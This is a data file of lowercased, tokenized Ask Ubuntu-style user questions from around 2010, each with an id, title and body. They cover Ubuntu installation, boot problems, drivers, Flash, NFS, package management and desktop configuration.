15327	install ubuntu netbook 10.10 without cd/usb/wubi from hdd on winxp	i have downloded the ubuntu netbook 10.10 iso file . when i mount it on a virtual drive it gives me the option to install it via cd ( restart and boot from disc ) or use the wubi installer . the wubi installer warns about poor disc performance . there is a way to convert the wubi installed ubuntu into a dedicated partition ubuntu installation via lvpm . the official guide links to a how-to for 7.04/7.10/8.10 , whereas the forum says lvpm currently does not work with installs generated by wubi 10.04 ( patches welcome ) . so the status about 10.10 is unknown . plus even if lvpm does work , it has the problem of wiping the partition on which it is going to be installed . is there a way to install ubuntu without using a usb/cd ? yes - > wubi is there a way to install a normal ubuntu installation using wubi ? yes - > lvpm but lvpm needs a clean partition . can i install ubuntu into an existing logical partition without having to lose or move my files in advance to another partition with or without the wubi method ? ( my netbook : primary partition ( 40gb ) : winxp home ( free space 3gb ) logical partition ( 100gb ) : data ( free space ~10gb ) ) i have seen some programs like norton ghost , partition magic etc . boot into a different environment to format or restore hdds from winxp ( after restarting ) . ca n't a installer do something similar and boot into a ubuntu installer environment ? i have been through this is it possible to install ubuntu without a cd or usb drive ? ( i had asked this question on http : //superuser.com/questions/215661/install-ubuntu-netbook-10-10-without-cd-usb-wubi-from-hdd-on-winxp but since this looks like a better place i am posting it here . )
15328	is possible to change desktop wallpaper in unity ? if yes , how to do ?	i 've installed ubuntu netbook edition 10.10 on a new latptop for a people whit zero knowledge of how to use a computer . me and other people in our spare time are teaching the basics , like navigate with firefox , email and concept like files , folders and desktop . but i 'm unable to change the desktop wallpaper ... there is no right click on it , so how to change it ? it possible in a simple way to teach to this person ?
15336	does unity work on intel gma x4500 ?	does anyone use unity with an intel gma x4500 graphic card ? does it work ?
15337	do we need swap partition on a lamp server ?	do we need actually swap partition on the ubuntu-server with lamp ? i think i do n't need it , but better to know for sure if it will not cause some unpredicted behaviour . actually my thoughts were : the server never hibernates if it is swapping one need to think about loadbalancing/traffic shaping , etc ... am i right can i turn off the swap for production server ? thanks !
15340	spanning gnome-panel across dual monitors	is it possible to make gnome-panel span across the top of both screens ( positioned side-by-side ) ? preferably , it should involve a solution where the additional screen can be painlessly added or removed at a whim - this is a laptop set up ; xorg restarts are a no-go , and dpi/position/resolution of the screens are different ( so it does not look like one big screen , if you know what i mean ) . if this helps : i am using nvidia 's proprietary , ubuntu 10.04 .
15346	ca n't view videos in flash now i 've upgraded to 10.04	i 've just upgraded to the lts and now i ca n't watch any videos on your tube via flash in either firefox or chrome . i had the issue with chrome before i upgraded , but i could still see them in firefox without an issue and i figured the upgrade would fix this . i am getting the error message 'the adobe flash plug-in has crashed ' and then underneath the viewing panel it says 'upgrade to flash player 10 for improved playback performance . upgrade now or more info . ' i have checked in the software centre and it is showing a green tick next to adobe flash plug-in for mozilla . can anyone help me please ? i really need to be able to view videos . thanks loads , kat x
15348	battery life greatly depreciated in 64-bit when compared to 32-bit	i have a dell e6400 and have been using ubuntu on this machine for just over a year . previously i used 9.10 on 32bit . when i upgraded to use 10.04 i remained on 32bit and battery life seemed just fine . i changed to 64-bit and since then i get the `` battery life is old '' notification and the battery just doesnt last more than 20mins even with a full charge . how would i tell which application is draining off the battery ? also is this a known issue ?
15353	update destroyed grub	i have ubuntu 10.04 ( lucid lynx ) installed on my notebook via wubi . since a recent ubuntu update however my system does n't work anymore . when i boot i get into grub rescue > . after some internet reading i concluded that i would have to re-install grub ( i was forgotten : $ that i installed ubuntu via wubi , thought i had it standalone.. ) and used this tutorial . now i have a command line grub and am confused about what to do . my directory structure is as follows : /dev/sda5 ( ntfs ) /boot /grub < grubfiles > /ubuntu /disks /boot /grub < empty > /install /winboot ... ... is it logical that /ubuntu/disks/boot/grub/ is empty ? i would like to get the bootloader back to being able to choose between windows and linux . any help appreciated : ) update my problem is kind of solved by installing a standalone ubuntu 10.10 . now i got my bootloader back correctly , have to go through 3 bootloader screens now to enter ubuntu 10.04 though ^^
15354	how to open file with default application from command line ?	in nautilus , when you double click a file , it will open it with the default application associated with the file 's extension . for instance , .html files will open in a web browser and .pdf will be opened with document viewer . is there a way to reproduce the same behavior from within the command line ( i.e . open path/filename ) ? i 'm asking because i like to browse my file-system from the command line but sometimes do n't remember which app . opens what .
15358	can i use skype through empathy ?	i 'd prefer to have my communications centralised in empathy . is it possible to see my skype contacts in empathy and use voice , video or chat ?
15361	how make a configure/makefiles from an c file ?	hope this is not a stupid question . but here it goes ... over the last month i have learned programming in c and gtk to a point where i have written a small program in c. i would like to make a ubuntu package of my program . the project contains 3 glade files and 1 c file . i know that there is documentation on packaging ubuntu packages from a tar ball as per this question . how to create deb installer from tarballs ? but my question is how do i go from the 4 files to the tar ball state ? i am not looking for the tar -cf ... what i am looking for is a guide that will help me create configure / makefiles ect .
15362	netbooks for sale without windows in the uk	i 'm looking to buy a ~10inch screen netbook that works with ubuntu . that 's probably the easy bit . there are dozens of good options available . unfortunately , everything i look at is shackled to its own copy of windows . i do n't believe in paying for something i 'm not going to use ( unless it 's cheaper than any other option ) . so far the only thing that really checks the boxes is the lemur ultrathin from system76 but it 's a us company and while they do deliver to the uk now , it would likely rack up import taxes , vat , etc ... paired with an exchange rate that can go either way , and it looks like it could be a bit expensive . so i 'm looking for uk-based options . around âł400 . 7-13 '' screen ( as long as it 's small ) . either running ubuntu ( or something that can be replaced by ubuntu ) or naked . obviously with good linux support ... and modern hardware that will last a couple of years .
15373	how do i make my encore enltv-fm record a specific channel ?	i 've finally gotten my card to work on ubuntu , but i need it to record every day from 3 to 4 pm on channel 26 . how would i do that ? i 've tried using gnome-schedule and i 've programed it to launch tvtime and a desktop record program , and it works , program but the problem is that it records channel 2 instead of channel 26 . how do i make it change the channel ? or do you have any other ideas without a desktop recorder ? .
15377	loading daemon at startup	is there an elegant way , other than messing with /etc/rc ? .d , to control the daemon loading at boot time ? my personal concern is stopping nginx from loading at boot , while setting lighttpd to do load at boot . thanks in advance , adam
15378	how do i install a ssh private key generated by puttygen ?	i set up my linux server to accept connections from my home pc by adding the public key generated by puttygen to the authorized_keys file . now i 'm trying to connect to the same machine , but this time from another ubuntu machine . i have to use the same private key ( for a weird reason , do n't ask.. ) and i do n't quite get how to install it on my client ubuntu . do i have to convert it to some other format ?
15379	force device name / order - sas tape drive	i 'm having a fun problem here , we have a 10.04 server running bacula with 2 sas tape drives . last friday i had to unplug the tape drives a couple of times . today , the devices are `` reversed '' ( nst0 is now nst1 ) . is there a way to force the device name , so that nst0 is always assigned to the same drive ? ( as in , if nst0 is not plugged in , nst0 will not be assigned to another device . ) here 's the content of /dev/tape/by-id : lrwxrwxrwx 1 root root 9 2010-11-26 13:38 scsi-3500e09e0001b81e6 - > ../../st1 lrwxrwxrwx 1 root root 10 2010-11-26 13:38 scsi-3500e09e0001b81e6-nst - > ../../nst1 lrwxrwxrwx 1 root root 9 2010-11-26 13:38 scsi-3500e09e0001b9804 - > ../../st0 lrwxrwxrwx 1 root root 10 2010-11-26 13:38 scsi-3500e09e0001b9804-nst - > ../../nst0 thanks !
15380	xerox workcentre 3220 drivers	we just got a xerox workcentre 3220 in the office ( yay nobody looked up linux compatibility when ordering ) , and the 3119 drivers keep showing `` out of paper '' when trying to print . any ideas how to set this one up ?
15383	why does pressing alt + tab cause a freeze ?	lately my computer is freezing a lot when i do the alt + tab combination in order to change window focus . i do n't have compiz or anything like that . what could be causing the system to lock up like this ?
15389	nautilus freezes when connecting to ssh server	i have several nautilus bookmarks pointing to ssh servers , so that i can easily access them . out of nowhere this does n't work anymore . when i open a bookmark or enter ssh : //user @ server in the location bar , nautilus completely freezes and does n't recover ( edit : same with sftp : // ) . i can kill nautilus and the desktop will load again . everything else works as it should . as soon as i try to access a server through ssh , nautilus freezes again . nothing was changed on the servers and no updates have been installed on the computer . a reboot does n't help , either . i use key-authentication if that is important . i am being asked for the key-passphrase and then the freeze occurs . update : this stopped working while i was using it . i was uploading some files , did something else , and when i got back to upload some more edited files the freezing began . to me this feels like some messed up or incomplete cache files that nautilus still tries to use .
15390	how to clean up aptitude output ?	every time i use the cli to install something with aptitude i get this output : warning , in file '/var/lib/dpkg/status ' near line 60509 package 'virtualbox-3.0 ' : error in version string '3.0.10-54097_ubuntu_karmic ' : invalid character in revision number warning , in file '/var/lib/dpkg/status ' near line 60510 package 'virtualbox-3.0 ' : error in config-version string '3.0.10-54097_ubuntu_karmic ' : invalid character in revision number warning , in file '/var/lib/dpkg/available ' near line 64255 package 'virtualbox-3.0 ' : error in version string '3.0.10-54097_ubuntu_karmic ' : invalid character in revision number selecting previously deselected package libppl7 . ( reading database ... 328408 files and directories currently installed . ) unpacking libppl7 ( from ... /libppl7_0.10.2-7ubuntu1_amd64.deb ) ... ... ... processing triggers for man-db ... warning , in file '/var/lib/dpkg/status ' near line 60773 package 'virtualbox-3.0 ' : error in version string '3.0.10-54097_ubuntu_karmic ' : invalid character in revision number warning , in file '/var/lib/dpkg/status ' near line 60774 package 'virtualbox-3.0 ' : error in config-version string '3.0.10-54097_ubuntu_karmic ' : invalid character in revision number warning , in file '/var/lib/dpkg/available ' near line 64482 package 'virtualbox-3.0 ' : error in version string '3.0.10-54097_ubuntu_karmic ' : invalid character in revision number setting up libppl7 ( 0.10.2-7ubuntu1 ) ... ... how can i fix this ? i have even removed virtualbox , but this output still persists . there is this on the ubuntu forums http : //ubuntuforums.org/showthread.php ? t=1578934 but it did not work for me ( which step in the process given there actually fixes this problem ? ! ) . edit : the installation process itself works , but these lines are cluttering up the output .
15392	from ubuntu , `` back to my mac ''	i have a mac at home , and run ubuntu at work . i 'd like to be able to connect to my mac in a similar way to how i had when i worked on a mac . i have mobileme so i used back to my mac ( apple 's version to dynamic dns ) to connect and screen sharing ( vnc ) to access the screen . my question is , what 's the best way to recreate this setup so that i can do the same actions from ubuntu ? thank you .
15397	cheap compatible infrared receiver	i have a universal remote that i would like to use to control my ubuntu box setup using boxee . i 'm pretty familiar using lirc to get it setup ( which i 've used with an rf remote/receiver ) but i 'd like to know if anyone knows of a cheap , but compatible , infrared receiver i can buy for use with a common infrared multi-system remote . btw , i 'm running ubuntu 10.10 thanks for the help !
15405	blackboard ( webct ) takes ~2 min to load . any tricks to make it load faster ?	i 'm running stock openjdk on ubuntu 10.10 and webct in firefox loads very slowly . i have n't found anyone else complaining about this so , i 'm wondering how to go about debugging this . anyone else have this problem ? thanks .
15406	touchpad works in gnome , but not kde	this is on an hp g-61 laptop . any tips on how to fix the problem ? maverick , but the same problem was there in lucid ... i actually just tried this on my msi wind , and have the same problem . basically , i 'm installing kde onto a standard ubuntu setup using the kde desktop packages from the repositories , then selecting it manually on the login screen .
15408	flashplugin-installer vs. flashplugin-nonfree vs. adobe-flashplugin	when searching through synaptic for flash player i always see the options to use `` flashplugin-installer '' or `` flashplugin-nonfree '' or `` adobe-flashplugin '' . is there a reason to use one over the other ? i seem to be constantly running into problems with flash player freezing crashing , mostly because of running too many flash apps at once ( pandora/fantasy apps/youtube/etc ) . does using one of these over the other have performance benefits ? or am i confusing myself and it does n't really matter or they 're both the same ? thanks ahead of time for the advice !
15415	is there software similar to lernid for artwork ?	i 'm considering delivering online art tutorials and was thinking of using lernid when i noticed that it 's specifically for ubuntu-run/related events . is there any desktop software similar to it ?
15416	is there any kind of utility/protocol that can take premissions from root users ?	well i encountered a problem that i described in this question : problem with permissions after upgrading and while speaking with my friend about it he mentioned some kind of protocol that can take the permissions from root users he called it clinux but it think i misheard him because when i tried to google it , nothing came up .
15418	how can i change the default program for viewing pictures and photos ?	or any other program while i 'm at it , ubuntu built-in utilities are nice but there are better .
15419	how to list all the files in a tree ( a directory and its subdirs ) ?	for a task of mine i need to list all the files in a tree ( a directory , all its subdirs , all subdirs of those , etc. ) . i 'd prefer to see them in nautilus or krusader , but a command-line solution is interesting as well ( in this case i will need files full names , sizes and modification times to be listed ) .
15420	issue with compiling opensludge	i 've tried compiling an adventure game sdk called opensludge ( http : //sourceforge.net/projects/opensludge/ ) . i can compile everything okay include libalure through git ( openal library ) . but whenever i try to load this application it says it ca n't find the libalure.so.1 file . i check in usr/local/lib directory and it is sitting there with it 's symbolic link ? has anyone else had this issue ?
15425	`` unable to find a medium containing a live file system '' error when installing	i got this error while trying to install ubuntu 10.10 from a bootable usb stick on to asus x64j series laptop . after getting this error the installation fails to start . i have used the same usb stick on some other laptops and the installation started as usual . any help will be appreciated .
15426	looking for an ultra portable laptop for ubuntu	i 'm in the market for a new laptop , and portability is important since i really only use it when i 'm travelling to and from work - primarily for programming . i 've been searching high and low for something like this : less than 2kg hopefully intel i5 ( but negotiable ) no dvd drive - just do n't need it 4g ram either 7200rpm disk or ssd ( ssd preferable ) 13 inch screen not too pricey ( macbook air is about $ 1700 aud ) available in australia the dell inspiron 13z and lenovo edge 13 look close , but i 've not found anything that says i 'm not going to have a fight with compatibility . the macbook air 13 looks like the perfect hardware , but i 'm afraid it will just be easier to run macos than ubuntu . i want to stay with ubuntu , but the macbook air is only $ 1700 so i 'm in danger of becoming another apple fanboi if i ca n't find anything competitive . going through all the sites looking for stuff has been a huge waste of time system 76 does n't deliver to australia http : //www.linux-laptop.net/ and http : //www.linlap.com/ are hard work and not confidence inspiring http : //www.vgcomputing.com.au/nsintro.html is hard work again , searching for every laptop they say has excellent compatibility on the web to find out what spec it is http : //zareason.com/shop/strata-pro-13.html ( at $ 1345 usd ) looks interesting , but i 've got no idea how much i 'll get stung by customs importing dell inspiron 13z with i5 , 4g , 320 7200rpm disk , ati mobility radeon hd5430 - 1gb , dell wireless 1501 802.11b/g/n @ $ 1200 aud seems like the only competitor but is it compatible ? ( dell support offer no opinion - as far as they are concerned they only have 2 models that are certified for ubuntu ) am i worrying too much about the compatibility ? should i just go with dell ? or switch to macos ? ( it would be good to have a searchable database that had the full machine specs , and compatibility - i 'm thinking about building something ... but i do n't have much time right now ... ) thanks . update i went with a macbook air . the price/weight/power was just right . everything else was either too pricy ( i5 ) or too heavy , or underpowered ( su7300 1.3ghz ) . its a pity , because i did n't really want to leave ubuntu . i 'll still run it on my media center and spare ( heavy ) laptop .
15428	reboot without sudoer privileges ?	i 've been trying to get my ubuntu restart without having to edit the sudoers . this has been possible before ( in lucid i think ) using a dbus command : dbus-send –system –print-reply –dest=org.freedesktop.consolekit /org/freedesktop/consolekit/manager org.freedesktop.consolekit.manager.restart but this gives me an error . looks like things have changed . in kde ( which i do n't use ) one has something similar ( see this answer ) could anyone show me an alternative way to make my machine reboot from a script ( without adjusting rights )
15433	unable to lock the administration directory ( /var/lib/dpkg/ ) is another process using it ?	i get this error when trying to use apt-get : e : could not get lock /var/lib/dpkg/lock - open ( 11 resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) is another process using it ? how can i fix this ?
15437	why is my terminal freezing up ?	sometimes when my terminal freezes up and it will not let me type . i can not identify any causes , nor how to diagnose . any suggestions ? thanks ! gnome terminal 2.30.2 on ubuntu 10.04
15439	ca n't reboot netbook with any of the reboot parameters	i have a sony vpcw218ag netbook that i 've dual-booted with ubuntu 10.10 . unlike the preinstalled windows 7 , ubuntu will not reboot on this computer . rebooting from gnome , using the reboot command and sysrq+reisub all do n't work ; they end hanging with a blank screen . i have read that atom netbooks do n't have a keyboard controller and therefore the default reboot method , kbd , wo n't work . i have actually tried all ten reboot= parameters listed here ; none of them work . i have also tried disabling acpi with noacpi acpi=off for each one ; that did n't help either . are there any other things i can try to fix the rebooting problem ?
15442	what is the best way to control music on my pc from my iphone or android ?	apple has a very slick tool , called `` remote.app '' that allows you to control music playback on a pc running itunes , see . it lets you quickly select and queue songs for playback , and adjust the volume among other things . what 's the best linux-compatible alternative ? i 'm not married to a particular music player on my pc - banshee , rhythmbox , whatever , i 'm open . my ideal vision is laying on the couch queuing up songs without having to turn on a monitor . wow.. putting it like that makes me feel lazy . anyway ... vnc is cumbersome ... surely there 's a better way ?
15444	can wayland have network transparency implemented as a plugin ?	to my understanding there 's no reason why a wayland plugin ca n't hide the app in the local machine , forward it 's windows to a remote machine , and feed the app input from the remote machine . am i wrong ?
15447	save an edited file in nano , but no permissions	i edited a file in /etc/ that i want to save , but forgot to open it using sudo . i remember there was a command to save such a file in vi , and want to know if there is any such way to do it in nano ? thanks .
15448	is it possible to store files on ubuntu one without syncing them to a ( or every ) computer ?	i would like to use ubuntu one on all of my computers , but i do n't want all of the files to be synced with every computer . some of my computers do n't have a big enough hard drive to sync everything . i would like to have access to the files in the cloud , without having everything stored on my hard drive . is this a current or planned feature ?
15452	how can i find the version number of an installed package via dpkg ?	i use the dpkg -l command to find out what version of a package i have installed . for example : dpkg -l network-manager returns the information on the package : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-=========================-=========================-================================================================== ii network-manager 0.8.3~git.20101118t223039 network management framework daemon as you can see , it returns 0.8.3~git.20101118t223039 which is wrong because it truncates the version ( i 've picked a long one for the purpose of this question ) . the way i 've solved this in the past is to pass a stupidly long columns argument to make it expand : columns=200 dpkg -l network-manager which gives me the entire version number , but also a bunch of junk : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-============================================-============================================-======================================================================================================== ii network-manager 0.8.3~git.20101118t223039.d60a988-0ubuntu1 network management framework daemon now i can see the full version number , which is 0.8.3~git.20101118t223039.d60a988-0ubuntu1 . i get the feeling that this is not the proper way to find the version number of an installed package . this never really was a problem in the past , but with the tacking on of `` ubuntu '' in the versions and the proliferation of ppas these strings are getting longer and longer . is there an easier way ?
15456	ca n't start oowriter	i have some problems to start open office on ubuntu 10.10 . i 've tried to start it by menu and by terminal ( oowriter ) . both ways are not working . it 's confusing to see that starting openoffice by typing ooffice in the terminal is working fine . so that 's a workaround for me to use the openoffice writer , but it 's no satisfying solution . when i execute `` ooffice -writer '' ( see comments ) i get the following message : terminate called after throwing an instance of com : :sun : :star : :lang : :wrappedtargetruntimeexception ' i figured out that root can start oowriter . so it seems to be a permission problem . it 's a default ubuntu openoffice installation . how can i fix this ?
15457	gnome panel suddenly becomes transparent !	my ubuntu is 10.04 . the top and bottom gnome-panel suddenly become transparent . however mouse click the position of menu , the application menu could be shown . it could be fixed by restarting my x-seesion ( logout then login ) . but it would happen again in several hours . does anyone have idea to fix it permanently ? update : the compiz is off . however the panel will show after changing the 'visual effects ' option from 'none ' to 'normal ' . update2 : changing theme also make the panel visible again . but it would be invisible again in minutes .
15461	upgrade of ubuntu 10.04 ( 32-bit ) to 10.xx ( 64-bit )	i want to upgrade my ubuntu ( 32-bit ) installation to a 64-bit installation . what is the recommended way , should i make a complete reinstallation from scratch or is there an upgrade possibility from 32-bit to 64-bit ? are there any differences between the two methods ?
15465	does gnome do work with gnote ?	there 's a great plugin for gnome do that searches tomboy notes really quickly . i ca n't imagine living without it . i want to switch to gnote , but i do n't know whether it will work with gnome do . is there a simple way to get them to work together ?
15467	indicator applet and sound manager for oss sound system	alsa was n't functioning well on my laptop . the open source oss sound system also failed to install . so i installed the closed source version of oss and it is working fine . but the volume indicator applet in the system tray disappeared after installing oss . the sound manager in system - > preferences is giving an error . i tried to do sudo apt-get install oss4-gtk but it also tries to install `oss4-base ' ( which is open source version ) . how can i install the volume indicator applet and sound manager for closed source version of oss ?
15470	automatically choose `` try ubuntu without installing '' after booting from usb startup disk	i have created a usb bootup stick for 10.10 , and reduced the timeout to 0 sec ... but after it boots up it shows two options either to install or try ubuntu ... i want to avoid this screen and directly go to the tryout mode ... at the first screen at bootup if i press any key , there is an option to select `` try ubuntu without installing '' , in this case i go to tryout mode directly ... i want this behaviour without pressing any key ... any suggestions ? ? ? thanks .
15471	enable compiz on intel core i5 ( nvidia gt330m ) based laptop	i am trying to enable compiz on my laptop via desktop effects but it does not allow it . i modified the xorg.conf file as on the compiz wiki but still no luck . so can someone just tell me how to enable compiz desktop on an intel i5 based system . this is an arrandale processor so its got the graphics bit on the processor itself . my system also has a discrete graphics card ( nvidia gt330m - yup its those hybrid graphics combos n- not optimus ) . as far as i know the nvidia gpu is not being used since the intel one is enabled and there is no bios route to disable it . the laptop is a dell vostro 3700 with bios version a10 i did lotsa google searches about intel compiz , etc but not a single conclusive guide as to how to enable it . so my guess is it should work out of the box . but it does n't . glxinfo gives me : name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . 3 glxfbconfigs : visual x bf lv rg d st colorbuffer ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- segmentation fault lsbusb gives me : 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 18 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt216 [ geforce gt 330m ] [ 10de:0a29 ] ( rev a2 )
15473	can mencoder use multiple cores , or is there another aud-vid encoder which can ?	i 'm looking for a good audio-video encoder which can utilize all cores of a multi-core cpu . i 've tried mencoder , but i ca n't see a `` multi-core '' option , and it appears to be using only one core at any given moment . if mencoder can not utilize multiple cores , is there another program which can ? it doesnt ' bother me whether it is a gui or cli ...
15474	why is ubuntu one sluggish ?	i have been using ubuntu one for awhile and i noticed that it is a bit sluggish when it comes to updating the documents in the ubuntu one folder . i have linked both , my laptop and desktop with ubuntu one . why does this situation occur ? i also have a dropbox account and it updates very fast ; almost instantaneous . i love my ubuntu one . can somebody explain this situation to me ? my laptop : acer aspire 4710 ( ubuntu 10.04 lts ) duo core , 2gb ram . my desktop : dell optiplex 700 ( ubuntu 10.04 lts ) core duo , 2gb ram .
15475	database data modeler application	is there some application for creating database data model diagrams that is able to generate sql expressions which will create the database schema ?
15476	input / output error , drives randomly refusing to read / write	i have an issue with one of our servers running ubuntu 10.04 , it is running backuppc and collects backups from various machines / servers around the building . on the 8th minute ( 12:08 , 12:18 , 12:28 etc ) the backups are transferred to an external hard drive , we have three and rotate one drive for another everyday . the problem we are having is we are randomly experiencing input / output errors , when this happens you can not read / write to the drive , it has n't unmounted so i can cd to the mount point /media/backup1 . the drives are not faulty as it 's happening on all of them , so i 'm at a loss as to what the problem could be , here is an example of the many errors we get : gzip : stdout : input/output error /var/lib/backuppc/backuppc_offline : line 47 : /media/backup1/tue/offline.log : input/output error ls : can not access /media/backup1/tue/incr_1083_host1.something.co.uk.tar.gz : input/output error ls : can not access /media/backup1/tue/incr_1088_host1.something.co.uk.tar.gz : input/output error ls : can not access /media/backup1/tue/incr_1089_host1.something.co.uk.tar.gz : input/output error ls : can not access /media/backup1/tue/incr_1090_host1.something.co.uk.tar.gz : input/output error /var/lib/backuppc/backuppc_offline : line 39 : /media/backup1/tue/offline.log : input/output error /var/lib/backuppc/backuppc_offline : line 44 : /media/backup1/tue/offline.log : input/output error /var/lib/backuppc/backuppc_offline : line 45 : /media/backup1/tue/incr_1090_host1.something.co.uk.tar.gz : input/output error /var/lib/backuppc/backuppc_offline : line 47 : /media/backup1/tue/offline.log : input/output error ls : can not access /media/backup1/tue/incr_591_tech2.something.co.uk.tar.gz : input/output error /var/lib/backuppc/backuppc_offline : line 44 : /media/backup1/tue/offline.log : input/output error /var/lib/backuppc/backuppc_offline : line 45 : /media/backup1/tue/incr_591_tech2.something.co.uk.tar.gz : input/output error /var/lib/backuppc/backuppc_offline : line 47 : /media/backup1/tue/offline.log : input/output error ls : can not access /media/backup1/tue/incr_592_tech3.something.co.uk.tar.gz : input/output error ls : can not access /media/backup1/tue/incr_593_tech3.something.co.uk.tar.gz : input/output error /var/lib/backuppc/backuppc_offline : line 44 : /media/backup1/tue/offline.log : input/output error /var/lib/backuppc/backuppc_offline : line 45 : /media/backup1/tue/incr_593_tech3.something.co.uk.tar.gz : input/output error /var/lib/backuppc/backuppc_offline : line 47 : /media/backup1/tue/offline.log : input/output error edit âť resolved so it turns out quamis was right , even though i did n't think it was possible it was actually a problem with the drive . you see we have three drives all formatted to ext2 , on two of them we were getting i/o errors frequently , i cam back to quamis ' answer and discovered the fsck command , so ran it against the problems drives : fsck /dev/sdb1 this found and fixed a load of problems on the drive , most probably caused by power outages / unsafe removal of drives etc , as the drives are in the xt2 format they are n't journalled and thus are n't protected against such issues . drives are now working beautifully , thanks all ! : d
15479	.wav files in rhythmbox ?	the default music player does not play .wav files . please help me .
15484	error caused by dropbox in update manager	i am getting the following error message when the update manager runs : apt authentication issue problem during package list update . the package list update failed with a authentication failure . this usually happens behind a network proxy server . please try to click on the `` run this action now '' button to correct the problem or update the list manually by running update manager and clicking on `` check '' . w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used.gpg error : http : //linux.dropbox.com lucid release : the following signatures were invalid : nodata 1 nodata 2 w : failed to fetch http : //linux.dropbox.com/ubuntu/dists/lucid/release w : some index files failed to download , they have been ignored , or old ones used instead . this error started to appear recently and for no obvious reason ( maybe because i created myself a private pgp key ? ) . i 'm running dropbox v0.7.11 on ubuntu lucid 10.04 .
15492	does geany or gedit provide a browser protocol in the way textmate does with txmt : // ?	textmate on the mac can be bound to the txmt protocol , meaning that development frameworks ( such as the play framework ) can be configured to use this to display error messages . if a stacktrace appears , each line of the stacktrace is a url of the format ( i 'm guessing ) : txmt : ///home/myuser/projects/myproject/problemfile.java:123 ( where 123 is the line number ) . clicking this opens the file in textmate . is this possible with gedit , geany or another programmer 's text editor ?
15494	running software in another x session	i am testing the firefox nightly builds . on occation , the nightly builds crashes x . is it possible to start a separate x session to run the crashing program in ? does vncserver run its own x session ? if so , it would probably solve my problem if i ran the nightly firefox in a vnc server .
15496	teaching bash to beginners who only used windows	i 'm supposed to give an introduction to using the shell ( i.e . bash ) to total beginners . which is the most basic/useful stuff i can teach someone within 1 1/2 hours without demanding too much ? here are some point i thought up : where am i ( pwd ) change directories ( cd , cd .. , cd - ) create directories ( mkdir , mkdir -p ) rename files/directories ( mv ) copy files/directories ( cp , cp -r ) listing directory entries ( ls , ls -l , ls -a )
15497	how to remove nvidia hdmi audio output in pulseaudio ?	at each reboot , pulseaudio set the profil `` hdmi audio output '' as the default one . so , at each reboot , i have n't the sound under maverick , and need to reconfigure it each time , to the `` analog output '' ! how can i remove/disable this hdmi thing ?
15498	how to setup automount/autofs	i 've followed the ubuntu help docs for setting up nfsv4 on a server running ubuntu 10.4lts and now i 'm trying to get autofs ( on ubuntu 10.10 ) to mount the exports , following these instructions . so far it does n't work . where the docs say server -fstype=nfs4 server : / i 'm supposed to replace 'server ' with my server 's hostname right ? if yes , should that be server-foo or server-foo.local ? # sample /etc/auto.master file # -- - comments snipped -- 8 < -- +auto.master # pre-existing /nfs /etc/auto.nfs # added by me . # manually created /etc/auto.nfs ubuntu-server.local -fstype=nfs4 ubuntu-server.local : / ls /nfs/ubuntu-server /nfs/ubuntu-server.local shows nothing . what 's the next troubleshooting step ? [ update 2011-feb-12 ] i followed the procedure outlined at which to use nfs or samba ? . i 've now verified that my server export is working because i can mount the nfs shares via /etc/fstab . here is my config , server side : /home/matt 192.168.1.0/255.255.255.0 ( rw , sync , no_subtree_check ) /home/shared 192.168.1.0/255.255.255.0 ( rw , sync , no_subtree_check ) and in client /etc/fstab : ubuntu-server : /home/matt /nfs/matt nfs rw , hard , intr 0 0 ubuntu-server : /home/shared /nfs/shared nfs rw , hard , intr 0 0 followed by sudo mount /nfs/shared . ( i also needed to add an entry to /etc/hosts so the server name would resolve to ip )
15507	what the best solution for dropbox in indicator applet ?	i need a solution for dropbox , i would like to put in indicator applet ! what the best solution ? tks !
15515	disk by uuid not detected ( initramfs ) , boot failure	i am unable to boot my lucid , with the built in boot shell giving out this error : update 1 this error occured after i updated my 2.6.32-26 version kernel and booted directly in winodows . the rootdelay solution did not work . is there any chance that my disk 's uuid got changed ( maybe by windows ) , i could log in to my ubuntu earlier but after logging into windows , and rebooting i get this error . as far as backing up is concerned , do i need to even if i have separate home and workspace partitions than ubuntu installation ? update 2 the update after which this happened was just an update ( no new install ) of version 2.6.32-26 . so i guess this has something to do with last update of this version of kernel . also since it was not a new install , no new menu entry was added . by any chance may this be caused because of my rebooting in windows after the kernel update . update 3 installed older kernel by chrooting through live usb , still the same problem with the kernel . so it seems the problem is not due to kernel update after all . i have faced this problem earlier too but back then , i just considered reinstalling distribution easier ( i used to distro switch a lot ) . but now i had configured it too far and so looking for some last resort . update 4 reinstalled buntu . configuration was easier this time thanks to separate home and workspace partitions . even tough i do n't need the solution of this problem just now but if you know any possible solution please post here for future benefits .
15518	how do i install wine ?	can someone please explain how i can install wine in the following ways ? by using the package manager ? by downloading and installing a pre-built package ?
15520	how can i tell ubuntu to do nothing when i close my laptop lid ?	i would like closing the laptop lid to be a no-op . how can i do that ?
15526	how to shut down the computer after a task has been completed ?	i usually start a download before i go to school . which command should i use to automatically make the necessary saves and turn off the computer after a particular task has been completed ? ( say , after installing the updates , or after downloading a large file . ) i have also cross-posted this at unix.stackexchange .
